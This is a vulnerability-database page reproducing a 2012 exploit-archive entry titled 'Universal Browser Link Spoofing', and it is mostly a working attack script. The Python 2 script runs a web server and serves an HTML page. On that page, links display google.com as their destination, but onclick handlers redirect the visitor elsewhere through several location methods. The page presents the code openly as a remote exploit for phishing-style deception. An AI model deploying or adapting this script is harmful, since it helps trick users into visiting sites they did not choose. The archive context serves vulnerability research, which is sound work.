Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Universal Browser Link Spoofing

🗓️ 30 May 2012 00:00:00Reported by S4(uR4Type 
zdt
 zdt🔗 0day.today👁 29 Views

Universal Browser Link Spoofing exploit targeting multiple browsers. Allows attackers to spoof links in various browsers including Mozilla Firefox, Google Chrome, Internet Explorer, Opera, and Safari, by manipulating the onclick event to redirect users to a malicious site

Code
#!/usr/bin/env python

'''
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0                 I'm S4(uR4 member from r00tw0rm team                 1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
'''

#
# Name      : Universal Browser Link Spoofing
# Date      : may, 30 2012
# Author    : S4(uR4
# Platform  : all
# Type      : remote exploit
# Web       : www.r00tw0rm.com
# Email     : [email protected]
# Credit and special thanx : iamjuza
# Tested on : Mozilla Firefox 12, Google Chrome 19, Internet Explorer 9.0, Opera 11.62, Safari 5.1.2
# Special thanks to :  r0073r, r4dc0re, Sid3^effects, L0rd CrusAd3r, KedAns-Dz, Angel Injection, gunslinger, JF, CrosS (1337day.com)
#                      Xenu, Versus71, alsa7r, mich4th3c0wb0y, [email protected], th3breacher, s3rver.exe (r00tw0rm.com)


import sys
import socket

from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler

class RequestHandler(BaseHTTPRequestHandler):
    def get_exploit(self):
        exploit = '''
            <html><head><title>Remote Browser Link Spoofing Exploit(Webkit, Gecko, Presto, IE)</title></head><body bgcolor='#969696'>
            <h1>Spoofing Exploit (for all browsers engine : Webkit, Gecko, Presto, IE)</h1>
            <pre>------------------------------------------------</pre>
            Method this.href="         : <a href="http://www.google.com/" onclick="this.href='http://xakep.ru'">Click me!</a><br />
            Method location.reload=''  : <a href="http://www.google.com/" onclick="location.reload='http://www.xakep.ru'; return false;">Click me!</a><br />
            Method location.replace(''): <a href="http://www.google.com/" onclick="location.replace('http://www.xakep.ru'); return false;">Click me!</a><br />
            Methon location.assign('') : <a href="http://www.google.com/" onclick="location.assign('http://www.xakep.ru'); return false;">Click me!</a><br />
            <pre>------------------------------------------------</pre>
            Method window.location.assign('')  : <a href="http://www.google.com/" onclick="window.location.assign('http://www.xakep.ru'); return false;">Click me!</a><br />
            Method window.location.replace('') : <a href="http://www.google.com/" onclick="window.location.replace('http://www.xakep.ru'); return false;">Click me!</a><br />
            Method window.location.href=''     : <a href="http://www.google.com/" onclick="window.location.href='http://xakep.ru'; return false;">Click me!</a><br />
            <pre>------------------------------------------------</pre>
        </body>
    </html>
    '''
        return exploit

    def log_request(self, *args, **kwargs):
        pass
        
    def do_GET(self):
        try:
            if self.path == '/':
                print
                print '[-] Incoming connection from %s' % self.client_address[0]
                self.send_response(200) 
                self.send_header('Content-Type', 'text/html')
                self.end_headers()
                print '[+] Sending exploit to %s ...' % self.client_address[0]
                self.wfile.write(self.get_exploit())
                print '[+] Exploit sent to %s' % self.client_address[0]
        except: 
            print '[-] Error : an error has occured while serving the HTTP request'
            exit_program()
            
def exit_program():
    print '[+] Exiting ...'
    sys.exit(0)
                       
def main():
    if len(sys.argv) != 2:
        print 'Usage: %s [any port between 0 and 65535]' % sys.argv[0]
        sys.exit(0)
    try:
        port = int(sys.argv[1])
        if port < 0 or port > 65535:
            raise ValueError
        try:
            serv = HTTPServer(('', port), RequestHandler)
            ip = socket.gethostbyname(socket.gethostname())
            print '[+] Server is running at http://%s:%d/' % (ip, port)
            try:
                serv.serve_forever()
            except:
                exit_program()
        except socket.error:
            print '[-] Error : a socket error has occurred'
            exit_program()    
    except ValueError:
        print '[-] Error : an invalid port number was given'
        exit_program()
            
if __name__ == '__main__':
    main()




#  0day.today [2018-03-03]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
30 May 2012 00:00Current
7.1High risk
Vulners AI Score7.1
browser link spoofingexploitgecko enginewebkit enginepresto engineinternet explorermozilla firefoxgoogle chromeoperasafariremoteweb security
29